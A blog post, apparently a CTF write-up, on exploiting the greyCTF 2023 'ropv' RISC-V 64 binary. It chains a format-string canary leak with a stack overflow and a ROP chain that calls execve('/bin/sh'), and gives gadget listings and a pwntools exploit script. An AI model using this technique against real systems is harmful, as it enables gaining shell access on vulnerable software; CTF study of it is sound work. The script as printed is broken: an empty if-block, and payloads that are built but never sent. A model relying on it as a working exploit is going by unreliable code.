Hello I am Arsalan. Offensive Security Engineer, I blog about Cyber security, CTF writeup, Programming, Blockchain and more about tech. born and raised in indonesia, currently living in indonesia

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Riscv64 Rop Chain

Did you know what is riscv?


On Friday, 19 May, 2023. I participate on greyCTF 2023 and solved several challenge. In this post I will only cover a challenge called ropv, since this is my first time exploiting RISC-V 64 architecture. It might be useful note for me or someone in order create the ropchain exploit.

What is Riscv64?

RISC-V (pronounced “risk-five”) is an open source instruction set architecture (ISA) based on established reduced instruction set computing (RISC) principles.

In contrast to most ISAs, RISC-V is freely available for all types of use, permitting anyone to design, manufacture and sell RISC-V chips and software. While not the first open ISA, it is significant because it is designed to be useful in modern computerized devices such as warehouse-scale cloud computers, high-end mobile phones and the smallest embedded systems. Such uses demand that the designers consider both performance and power efficiency. The instruction set also has a substantial body of supporting software, which fixes the usual weakness of new instruction sets.

The project was originated in 2010 by researchers in the Computer Science Division at UC Berkeley, but many contributors are volunteers and industry workers that are unaffiliated with the university.

  • https://wiki.debian.org/RISC-V#What_is_RISC-V.3F

Dynamic Analysis

Since my Binary Ninja and IDA can’t decompile the riscv64 elf binary. So I started by doing some dynamic gdb stuff and blackbox. We can use qemu to emulate the riscv64 and gdb-multiarch to debug the binary remotely

gdb-multiarch -q ./ropv -ex 'target remote localhost:1235'
qemu-riscv64 -g 1235 ./ropv

I found that we have a format string vulnerability on the first input and a buffer overflow on the second input, So the plan is simple we can leak the variable address from the first index and leak the canary value from the third index

then we can overflow the second input and bypass the canary check so that we can control the %pc register and craft a ropchain to call execve with /bin/sh as the first parameter.


first we need some gadget to set the register value in order to call execve(). We can use riscv64 toolchain riscv64-unknown-elf-objdump to gather all gadget that we need. execve() in riscv64 is 221 and we need to set the register value to look like this

execve(0x[address to /bin/sh], 0, 0)

I use this gadget since it cover all registers we need

  4281a:	832a                	mv	t1,a0
    4281c:	60a6                	ld	ra,72(sp)
    4281e:	6522                	ld	a0,8(sp)
    42820:	65c2                	ld	a1,16(sp)
    42822:	6662                	ld	a2,24(sp)
    42824:	7682                	ld	a3,32(sp)
    42826:	7722                	ld	a4,40(sp)
    42828:	77c2                	ld	a5,48(sp)
    4282a:	7862                	ld	a6,56(sp)
    4282c:	6886                	ld	a7,64(sp)
    4282e:	2546                	fld	fa0,80(sp)
    42830:	25e6                	fld	fa1,88(sp)
    42832:	3606                	fld	fa2,96(sp)
    42834:	36a6                	fld	fa3,104(sp)
    42836:	3746                	fld	fa4,112(sp)
    42838:	37e6                	fld	fa5,120(sp)
    4283a:	280a                	fld	fa6,128(sp)
    4283c:	28aa                	fld	fa7,136(sp)
    4283e:	6149                	addi	sp,sp,144
    42840:	8302                	jr	t1

We also need another gadget so we can return safely to %a0 and trigger the syscall there

 another gadget
    4abf4:	6562                	ld	a0,24(sp)
    4abf6:	70a2                	ld	ra,40(sp)
    4abf8:	6145                	addi	sp,sp,48
    4abfa:	8082                	ret

Last thing we need an ecall instruction to trigger the syscall

 356de:	00000073          	ecall
    356e2:	8082                	ret

So our plan is:

  1. We leak the address variable and canary value from the first input
  2. craft a ropchain that can be used to bypass the canary protection
  3. overwrite the %pc to the first gadget so we can set all register properly to call execve() syscall
  4. since we already know the address of our input, we can stored our /bin/sh string there
  5. trigger the syscall by jump to ecall instruction

Here is my fullchain exploit script

from pwn import *
# context.log_level = 'error'

# offsite smash canary 8
# for i in range(0xff):
#     r = remote("", 12335)
#     r.sendlineafter(":","A")
#     r.sendlineafter(":","A" * i)
#     print("off:" + str(i))
#     print((r.recvline()))
#     print((r.recvall()))
#     r.close()

# brute
# for i in range(1, 0xff):
#     r = remote("", 12335)
#     print("--------------------------------------------------------")
#     x = "%" + str(i) +"$p"
#     print("payload: " + x)
#     r.sendlineafter(":",x)
#     leak = str(r.recvline()).replace("\\n","").replace("b'","").replace(" ","").replace("'",'')
#     print("leak:" + leak)
#     if "nil" in leak:
#         r.close()
#         continue
#     leak = int(leak,16)
#     print("leak converted:" + str(leak))
#     p = b"A" * 8
#     p += p64(leak)
#     p += b"X" * 200
#     r.sendline(p)
#     # r.interactive()
#     print(b"response: " + r.recvall())
#     r.close()

# ropchain
#  4281a:	832a                	mv	t1,a0
#    4281c:	60a6                	ld	ra,72(sp)
#    4281e:	6522                	ld	a0,8(sp)
#    42820:	65c2                	ld	a1,16(sp)
#    42822:	6662                	ld	a2,24(sp)
#    42824:	7682                	ld	a3,32(sp)
#    42826:	7722                	ld	a4,40(sp)
#    42828:	77c2                	ld	a5,48(sp)
#    4282a:	7862                	ld	a6,56(sp)
#    4282c:	6886                	ld	a7,64(sp)
#    4282e:	2546                	fld	fa0,80(sp)
#    42830:	25e6                	fld	fa1,88(sp)
#    42832:	3606                	fld	fa2,96(sp)
#    42834:	36a6                	fld	fa3,104(sp)
#    42836:	3746                	fld	fa4,112(sp)
#    42838:	37e6                	fld	fa5,120(sp)
#    4283a:	280a                	fld	fa6,128(sp)
#    4283c:	28aa                	fld	fa7,136(sp)
#    4283e:	6149                	addi	sp,sp,144
#    42840:	8302                	jr	t1

# another gadget
#    4abf4:	6562                	ld	a0,24(sp)
#    4abf6:	70a2                	ld	ra,40(sp)
#    4abf8:	6145                	addi	sp,sp,48
#    4abfa:	8082                	ret

# ecall gadget
# 356de:	00000073          	ecall
#    356e2:	8082                	ret

# input stored here 0x40008003f0
# /bin/sh\x00

ecall = 0x356de
gadget0 = 0x4abf4
gadget1 = 0x4281a

gets = 0x2662a

buffer = 0x40008003f0
buffer_remote = 0x4000800bb0

# local 3,4,9
r = remote("", 12335)
context.update(arch="riscv", os="linux")
# r = process("qemu-riscv64 -g 1234 ./ropv", shell=True)
# r = process("./ropv")
exe = ELF('./ropv')

x = "%3$p"
print("payload: " + x)
leak = str(r.recvline()).replace("\\n","").replace("b'","").replace(" ","").replace("'",'')
print("leak:" + leak)
if "nil" in leak:
    # continue
leak = int(leak,16)
print("leak converted:" + str(leak))
p = b"/bin/sh\x00"
p += p64(leak)
p += b"/bin/sh\x00"
p += p64(gadget0)
p += p64(0x111)*2
p += p64(0xdeadbeef)
p += p64(ecall)*2

p += p64(gadget1)
p += p64(0xdead)
p += p64(buffer_remote)
p += p64(0)
p += p64(0)
p += p64(0x3131313131313133)
p += p64(0x3131313131313134)
p += p64(0x3131313131313135)
p += p64(0x3131313131313136)
p += p64(221)
p += p64(0x3c74a)
p += p64(0x88888)*8

# print(b"response: " + r.recvall())
# r.close()

running the exploit and we got our flag :)